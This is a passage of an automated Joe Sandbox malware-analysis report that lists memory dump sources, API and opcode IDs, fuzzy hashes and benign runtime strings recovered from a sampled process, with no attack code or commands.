                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                            • Opcode ID: 76dfa9f6affd35542d897482e00a8f8d8a31374749d9766d0099c6e1fca2c63d
                                                                                                                                                                            • Instruction ID: 5dea9b6215d4ea52a715af4710fa4a61bd8a3e2adf44b7aa022a5baa014eba85
                                                                                                                                                                            • Opcode Fuzzy Hash: 76dfa9f6affd35542d897482e00a8f8d8a31374749d9766d0099c6e1fca2c63d
                                                                                                                                                                            • Instruction Fuzzy Hash: E5118E76A04F018AEB10CF31E8452A933A4FB0DB58F042A35EA5D43B94DF3CD1A5C750
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB2876
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB2886
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB2896
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB28A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: d01dba25007abe557549af685efbd49781723a6d9761e89bdcf780ad220a84d7
                                                                                                                                                                            • Instruction ID: 0ba02cee957adbc25e8cba9e32865a5105ed52ebc37cb17ed70bd8c11aa9d030
                                                                                                                                                                            • Opcode Fuzzy Hash: d01dba25007abe557549af685efbd49781723a6d9761e89bdcf780ad220a84d7
                                                                                                                                                                            • Instruction Fuzzy Hash: 87017C66E09A0B90FF28FB78F04C3386362EB44B55F900836C68E06696DF6CE0C48271
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                                                                                            • Instruction ID: 5b770a5764a52a0977fc1fbdcd47e847f7231771f788dba40c6bc1dd4968243c
                                                                                                                                                                            • Opcode Fuzzy Hash: d33a2170fbd08e1295aa745bb59190dabb63d073c9f8e86e5b0d8221db3b0f23
                                                                                                                                                                            • Instruction Fuzzy Hash: 9FF0A433A1864242EEA4BB61E5913BC6321EB40790FC04431E64E47A9ADF3CE8928310
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B52F3F
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B52F82
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                            • API String ID: 3668304517-2799312399
                                                                                                                                                                            • Opcode ID: f900907ded2f50d54d52aa96b2e03f19fce0c69ff2b6659e1f2decb36258605d
                                                                                                                                                                            • Instruction ID: 3d87d21ec4649c46ee5c4287a9ccb78f5ce6e8d9a1101a0ed39ac90b3c4baa73
                                                                                                                                                                            • Opcode Fuzzy Hash: f900907ded2f50d54d52aa96b2e03f19fce0c69ff2b6659e1f2decb36258605d
                                                                                                                                                                            • Instruction Fuzzy Hash: A3D1D3AAB0AA82C9FB50DF75D1502BE2761AB45B94F406071EF4E37B86DE3CE445CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B533EF
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B53432
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                            • API String ID: 3668304517-2799312399
                                                                                                                                                                            • Opcode ID: e632bfa2d873c0be3d312fc90208439f941055322aecca706e8eed900dda154e
                                                                                                                                                                            • Instruction ID: d432d8ef8e322b10e0e00d42d66a6ab1929bf73da72b2acd539ef0e0da615a18
                                                                                                                                                                            • Opcode Fuzzy Hash: e632bfa2d873c0be3d312fc90208439f941055322aecca706e8eed900dda154e
                                                                                                                                                                            • Instruction Fuzzy Hash: 23D1E3AAB0868689FB50CF76D5502BE2761AF44B84F44A131DF4E277A6DF3CE446CB40
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@
                                                                                                                                                                            • String ID: vector<T> too long
                                                                                                                                                                            • API String ID: 1004598685-3788999226
                                                                                                                                                                            • Opcode ID: fd96c43c9ae9a7940df19a78275077a50898266131be15fa7121a827a308b9e3
                                                                                                                                                                            • Instruction ID: 5e1df2fdaf46e6fe96c18937986e6d571d6d32fef408431e5d4ad2f478c12a0f
                                                                                                                                                                            • Opcode Fuzzy Hash: fd96c43c9ae9a7940df19a78275077a50898266131be15fa7121a827a308b9e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 1AB19E23B08A8685EF20DFB5E4502EDA376FB48B98B898236DE5D17798DF3CD4458350
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B5D5F4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: %.0Lf$0123456789-
                                                                                                                                                                            • API String ID: 3668304517-3094241602
                                                                                                                                                                            • Opcode ID: c075ca733a5e2985d7409c734a112bdb889e844c53dbfec16932d9e1d86b165b
                                                                                                                                                                            • Instruction ID: 3c24e0f1a791faf0a34b5d994915fb741b126352a325c352839f29d91a2091c8
                                                                                                                                                                            • Opcode Fuzzy Hash: c075ca733a5e2985d7409c734a112bdb889e844c53dbfec16932d9e1d86b165b
                                                                                                                                                                            • Instruction Fuzzy Hash: 61817B66B18B8586EB10CF75D5402AE23B1FB48B88F406236DF4D27BA9DF38E555C740
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 451473138-1018135373
                                                                                                                                                                            • Opcode ID: e4c021b48a88740338c5921ea959046dd8c7dfd39424219a23c6621b5fb580c7
                                                                                                                                                                            • Instruction ID: e5193fadb387492118c843924bddea07ca8553371a2348d44349ee876e0f74b3
                                                                                                                                                                            • Opcode Fuzzy Hash: e4c021b48a88740338c5921ea959046dd8c7dfd39424219a23c6621b5fb580c7
                                                                                                                                                                            • Instruction Fuzzy Hash: AD51AE6AB196128ADB14CF35E444B3A77A1FB44B98F229179DE4A53788DF3CE845CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturnswprintf_s
                                                                                                                                                                            • String ID: %.0Lf
                                                                                                                                                                            • API String ID: 296878162-1402515088
                                                                                                                                                                            • Opcode ID: 989814ed0aab853247327d7537572a65def7191e538b3b40b3089a5dc173ab06
                                                                                                                                                                            • Instruction ID: 63e8f408dadb952600ac72486cebc9cd9a11a4ae73cc41560cdbb052c51822e3
                                                                                                                                                                            • Opcode Fuzzy Hash: 989814ed0aab853247327d7537572a65def7191e538b3b40b3089a5dc173ab06
                                                                                                                                                                            • Instruction Fuzzy Hash: D0518166B18F8585EB01CF75E8402AE6360FB99B98F505232EE5D277A9DF3CD446CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CreateFrameInfo
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 2697087660-1018135373
                                                                                                                                                                            • Opcode ID: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                                                                                            • Instruction ID: 639b14001e193855b24d7b5d6fff64c08ed5e5d15e54bfeab5545828b5bb3d5a
                                                                                                                                                                            • Opcode Fuzzy Hash: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                                                                                            • Instruction Fuzzy Hash: CD5129BB61864286D720AF25E44436F77A4FB89B90F262234EB8D57B55CF3CE461CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF79CFB457A,?,?,?,?,?,00007FF79CFB3EB6), ref: 00007FF79CFB4334
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00007FF79CFB457A,?,?,?,?,?,00007FF79CFB3EB6), ref: 00007FF79CFB43B4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                            • String ID: string too long
                                                                                                                                                                            • API String ID: 237780522-2556327735
                                                                                                                                                                            • Opcode ID: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                                                                                            • Instruction ID: d427b6e85258f89c1b3a95447feb97649f4c1fe1c9a060c9c8e1bced142751de
                                                                                                                                                                            • Opcode Fuzzy Hash: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                                                                                            • Instruction Fuzzy Hash: 5131AE22B18A4281DE249F2AE64402CA672FF48FD4BAC5531CE1D87B98DF2CE4919370
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Strftime_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: !%x
                                                                                                                                                                            • API String ID: 1195835417-1893981228
                                                                                                                                                                            • Opcode ID: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                                                                                            • Instruction ID: 6c56d2ee3a70f69482aa0cd338f962d5f3a7cbf7361fd529d160442fc6096111
                                                                                                                                                                            • Opcode Fuzzy Hash: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                                                                                            • Instruction Fuzzy Hash: 19418CA6B08A819EFB10CFB5D4503ED2771AB5879CF409622EE5C27B8ADF38D145C760
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                            • String ID: string too long
                                                                                                                                                                            • API String ID: 237780522-2556327735
                                                                                                                                                                            • Opcode ID: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                                                                                            • Instruction ID: 9c8e837f65833daf41a74fade25facacc051e47d6718503515740600096ab0ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                                                                                            • Instruction Fuzzy Hash: E031A263F4CA4281EF249B2AE5401299232EB4CFD4F854133DE6E07BD9DF2CD4998350
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _errnoisspace
                                                                                                                                                                            • String ID: +
                                                                                                                                                                            • API String ID: 607103254-2126386893
                                                                                                                                                                            • Opcode ID: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
                                                                                                                                                                            • Instruction ID: 175ed11ffe9dc4809fce35ad441319b343894ccda69a1a6139e3ceaff31d0ae6
                                                                                                                                                                            • Opcode Fuzzy Hash: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
